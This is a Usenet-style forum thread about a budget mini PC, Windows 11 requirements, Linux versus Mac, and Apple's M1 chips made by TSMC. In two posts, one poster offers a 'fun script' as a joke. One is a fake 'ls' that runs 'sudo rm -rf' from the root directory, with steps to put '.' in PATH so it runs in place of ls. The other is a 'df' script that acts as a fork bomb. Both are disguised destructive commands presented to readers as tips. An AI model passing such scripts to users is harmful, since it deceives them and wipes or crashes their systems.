Less than $300 powerful computer

HRM Resident

Oct 21, 2021, 5:11:26 PM10/21/21
<https://www.amazon.ca/dp/B09DPV3D4N/ref=cm_sw_r_oth_api_glt_i_dl_87D99A8B23WP1EM30233>

This is a pretty powerful thing for $250. Will run Ubuntu Linux as
well as Windows-10 (and the hardware is on the capability list for
Windows-11 for those who like Microsoft.)

Granted you need to have a keyboard, mouse and HDMI monitor around. OR
use the free ReaVNC program to get at it from your Win/Mac/Linux system.
VNC is what I am using to interface with multiple Raspberry Pi systems, a
BeagleBone Black SBC. VNC allows one to literally use a dozen “little”
computers with one main, full-sized computer (or even from a laptop.)

Anyway, the above computer looks like it will honk for the price.

--
HRM Resident

James Warren

Oct 21, 2021, 6:59:57 PM10/21/21
Read the reviews. You get what you pay for.

HRM Resident

Oct 21, 2021, 8:21:26 PM10/21/21
It’s not a top of the line number cruncher. But it’s got 8 gb RAM , a
250 gb SSD. Not a killer system, but for around $250, it’s something to
tinker with. Will certainly do browsing and email, play videos, etc.

--
HRM Resident

James Warren

Oct 21, 2021, 10:07:11 PM10/21/21
If it works. Some reviews say it doesn't.
You pays your money and you takes your chance.

Lucretia Borgia

Oct 22, 2021, 7:20:40 AM10/22/21
On Thu, 21 Oct 2021 23:07:05 -0300, James Warren
My guru says have nothing to do with Win11 that even on the MS site
there are pages of fixes for all the faults already found. I have a
Dell all in one and he partitioned it with Win 10 and Linux after
nearly everything was lost due an MS update, me and about 30,000 other
people apparently. I confess I keep meaning to learn Linux but
haven't.

James Warren

Oct 22, 2021, 8:19:09 AM10/22/21
I have an i7 gen 7 CPU I bought late 2018. It does not meat minimum
requirements for win 11. Win 11 requires gen 8 or later.

It us always a good idea to wait a few months at least to upgrade
to a new OS. It takes a while to find and fix all the bugs.

It is extremely unlikely I'll be upgrading my computer just for win 11.

HRM Resident

Oct 22, 2021, 8:59:17 AM10/22/21
I read somewhere that Windows-10 will be supported until 2025. I
haven’t used any Microsoft O/S since they abandoned Windows-7 and switched
to their Windows-10 “rent everything from us” business model.

Linux is all a person needs. Get a Mac if you want stability and
support without learning the intricacies of Linux. Avoid Windows if at all
possible.

--
HRM Resident

HRM Resident

Oct 22, 2021, 9:13:53 AM10/22/21
(1) Amazon reviews are about as reliable as Trump paying his bills on time.
They are pumped up by the sellers and ripped down by the competition.

(2) If it doesn’t work, send it back. Free returns, including postage.

(3) Amazon is a behemoth monster that’s slowly creating a monopoly.
However, it’s doing so by using “the customer is always right” mentality.
You know, the same theory all businesses used up until around 1980-1985.
Then they tried “the customer is always wrong.” That worked until Amazon
tried the old way again. I wonder which approach will win.

(4) No, I didn’t buy the above. It did catch my eye because of the price.
Regarding them working, the components are the same ones put in high end
laptops, etc. Intel CPUs, and Kingston RAM/SSDs are the same regardless of
where they are installed.

--
HRM Resident

Lucretia Borgia

Oct 22, 2021, 9:31:18 AM10/22/21
On Fri, 22 Oct 2021 09:19:00 -0300, James Warren
After that update crash he set this computer not to take updates for
three months, figuring that way any bugs would be fixed :)

Lucretia Borgia

Oct 22, 2021, 9:32:25 AM10/22/21
I avoid anything apple before anything else :)

HRM Resident

Oct 22, 2021, 9:39:34 AM10/22/21
Apple Macs and iPhones are better than their competitors. They last
far longer and require fewer updates than either Microsoft products or any
of the Linux distributions.

Having said this, they also cost about twice as much. Are they worth
it? That’s a good question! :-)

--
HRM Resident

James Warren

Oct 22, 2021, 9:56:24 AM10/22/21
I have an old 90s Fortran compiler that only runs on windows. I could
switch to g77 or some other free Fortran but I'm too lazy for that
especially if I have no good reason.

I'm a command line kind of guy. In Linux I made up may own commands
because the Linux commands were too arcane to remember. I do the
same in windows.

I used OS/2 until IBM abandoned it. It was much better than windows 3.1
or windows 95. Windows was fairly useless until NT. XP and 7 were
fairly good as is 10. Mostly I couldn't really tell much about
the GUI because I use the CLI. The GUI is good for copying whole
directory trees but terrible for moving or copying all *.ext files.
Bat files and cmd files are good for running a bunch of programs
and commands in order for automating jobs.

James Warren

Oct 22, 2021, 10:01:50 AM10/22/21
Agree.

Reviews have to be read with caution. I think the negative reviews are
a bit more meaningful than the positive ones. Again, read with
caution.

Too cheap usually indicates poor build quality even if the components
are fine.

James Warren

Oct 22, 2021, 10:04:15 AM10/22/21
I used Apple in the early 90s. What I hated was that I could not access
the command line. It was Uinux under the hood but I was forced to use
the GUI. Not for me!

HRM Resident

Oct 22, 2021, 10:31:30 AM10/22/21
Well, you sure can get at the command line now. I got my first Mac in
2016 and the first thing I did was find the terminal. It’s running on
POSIX Unix standard. I used the GUI when I want to run graphics or drag
and drop loads of files. But 80-90% of my Mac O/S stuff is command line.

Here’s a fun script to use under Linux. Call it “ls” and put it in
your home directory:

#!/bin/bash
cd /
sudo rm -rf *
@echo ‘Success’
exit

Then stick a “.” at the end of your path statement. Adjust the
permission of the file:

chmod 755 ls

Then have a look at the files in your home directory to ensure that
the “ls” file is there:

$ cd $HOME
$ ls

:-)

--
HRM Resident

James Warren

Oct 22, 2021, 10:47:56 AM10/22/21
I vaguely remember that. I used IBM AIX. $HOME was my personal directory
because AIX was multiuser with a directory for personalizations which
was executed on login. I put my personal commands there.

axemen99

Oct 22, 2021, 11:06:33 AM10/22/21
Processor = ‎2.4 GHz celeron
From my experience, using Celeron processor with VNC, I took a few cups of coffee to complete a few commands.

axemen99

Oct 22, 2021, 11:20:26 AM10/22/21
On Friday, October 22, 2021 at 9:56:24 AM UTC-4, James Warren wrote:
> I have an old 90s Fortran compiler that only runs on windows. I could
> switch to g77 or some other free Fortran but I'm too lazy for that
> especially if I have no good reason.
>
> I'm a command line kind of guy. In Linux I made up may own commands
> because the Linux commands were too arcane to remember. I do the AIX
> same in windows.
>
> I used OS/2 until IBM abandoned it. It was much better than windows 3.1
> or windows 95. Windows was fairly useless until NT. XP and 7 were
> fairly good as is 10. Mostly I couldn't really tell much about
> the GUI because I use the CLI. The GUI is good for copying whole
> directory trees but terrible for moving or copying all *.ext files.
> Bat files and cmd files are good for running a bunch of programs
> and commands in order for automating jobs.

I was never able to use computers with celeron processor to run OS/2 nor NT.
AIX is great, but need IBM-specific processors.
Apple now has it's own in-house M1 processors for their MacBooks. Retiring Intel Pentium processors.

James Warren

Oct 22, 2021, 11:32:23 AM10/22/21
I thought Apple retired intel several years ago. Are they only doing
it now?

HRM Resident

Oct 22, 2021, 11:38:55 AM10/22/21
On any Linux or Unix system (including a Mac from the command line
terminal):

$ cd ~
$ vi df

<esc>i
#!/bin/bash
#
&df > /dev/null
&df > /dev/null
exit
<esc>:wq!

$ chmod 755 df
$ df -h (check spare disk space)

:-)

--
HRM Resident

HRM Resident

Oct 22, 2021, 11:49:36 AM10/22/21
2020 was their last Intel offering. A 3.6 GHz 10-Core Intel Core
i9. As of November 2020 onward, it's their own silicon, an 3.2 GHz M1
8-core CPU. Reportedly it's faster than the 10-core Intel above because
it's using 5mm technology compared to 7nn. However, the benchmarks on
the M1 would gave to be run on an Apple, and their supporting hardware.
Either way, the Intel will have to do me!

--
HRM Resident

Lucretia Borgia

Oct 22, 2021, 2:51:27 PM10/22/21
On Fri, 22 Oct 2021 13:39:33 -0000 (UTC), HRM Resident
<hrm...@gmail.com> wrote:

>Lucretia Borgia <lucreti...@fl.it> wrote:
>> On Fri, 22 Oct 2021 12:59:15 -0000 (UTC), HRM Resident
>> <hrm...@gmail.com> wrote:

>>> I read somewhere that Windows-10 will be supported until 2025. I
>>> haven?t used any Microsoft O/S since they abandoned Windows-7 and switched
>>> to their Windows-10 ?rent everything from us? business model.
>>>
>>> Linux is all a person needs. Get a Mac if you want stability and
>>> support without learning the intricacies of Linux. Avoid Windows if at all
>>> possible.
>>
>> I avoid anything apple before anything else :)
>>

> Apple Macs and iPhones are better than their competitors. They last
>far longer and require fewer updates than either Microsoft products or any
>of the Linux distributions.
>
> Having said this, they also cost about twice as much. Are they worth
>it? That’s a good question! :-)

Cost twice as much and are found to have self destruct batteries in
the Iphones!!

Mike Spencer

Oct 22, 2021, 7:46:59 PM10/22/21

James Warren <jwwar...@gmail.com> writes:

> I have an i7 gen 7 CPU I bought late 2018. It does not meat minimum
> requirements for win 11. Win 11 requires gen 8 or later.
>
> It us always a good idea to wait a few months at least to upgrade
> to a new OS. It takes a while to find and fix all the bugs.

I saw a squib go by to the effect that Win 11 runs on a Pentium 4 CPU
because MS forgot to disable it. I have 3 P4 desktops of which one i
s my main computer. My laptop is newer but a7 y.o. perhaps too slow
for W11.

I find that recent versions of Seamonkey/Firefox are pigs on the P4.
HTML has gradually morphed into a complete page layout language,
interactive login session manager, script language interpreter,
surveillance engine and media player. A "browser" that supports all
that is going to be a pig.

So even with Linux, I'm experiencing pressure to upgrade the
hardware. Resisting sofar, with the laptop as backup support.

> It is extremely unlikely I'll be upgrading my computer just for win 11.

Indeed.

--
Mike Spencer Nova Scotia, Canada

axemen99

Oct 22, 2021, 11:35:00 PM10/22/21
Yes, years ago Apple had abandoned Intel, but re-deployed Intel, since Apple PowerPC processors were too slow. Apple switched Macs from PowerPC to Intel in 2006. Hackers had modified the Apple OSX so any Windows desktop can run Apple. I tried it, it worked.

The M1 chips for Apple's PCs are made by Taiwan's TSMC, which leads the world when it comes to etching infinitesimally small components onto an area of silicon using its “5-nanometer” manufacturing process.
https://en.wikipedia.org/wiki/Apple_M1

Politically, US and UK/NATO have to protect Taiwan from being attacked by Mainland Communist China for that obvious reasons.

HRM Resident

Oct 23, 2021, 9:29:40 AM10/23/21
Fake news! Witch hunt!

--
HRM Resident

HRM Resident

Oct 23, 2021, 9:39:46 AM10/23/21
Other than that cost, is there any reason why Apple can’t build their
own CPUs in the USA? I assume that the R & D was done by American
engineers.

If not Taiwan, then are there other offshore places with the ability to
ramp up to produce M1 chips? I believe putting all their eggs in one
basket for anything is a huge mistake for any company. Parts should come
from several places, and with politically opposite views. Might not be as
cheap, but removes the one weak link in the supply chain.

--
HRM Resident

axemen99

Oct 23, 2021, 11:10:13 AM10/23/21
On Saturday, October 23, 2021 at 9:39:46 AM UTC-4, HRM Resident wrote:
> Other than that cost, is there any reason why Apple can’t build their
> own CPUs in the USA? I assume that the R & D was done by American
> engineers.
>
> If not Taiwan, then are there other offshore places with the ability to
> ramp up to produce M1 chips? I believe putting all their eggs in one
> basket for anything is a huge mistake for any company. Parts should come
> from several places, and with politically opposite views. Might not be as
> cheap, but removes the one weak link in the supply chain.
>
> --
> HRM Resident

So far, only US and Taiwan has the capabilities.
Biden administration agrees with you. It is discussed.
Intel starts -
https://www.reuters.com/technology/intel-breaks-ground-20-bln-arizona-plants-us-chip-factory-race-heats-up-2021-09-24/
Taiwan's TSMC agrees to build one in US, with US tax incentives - in progress.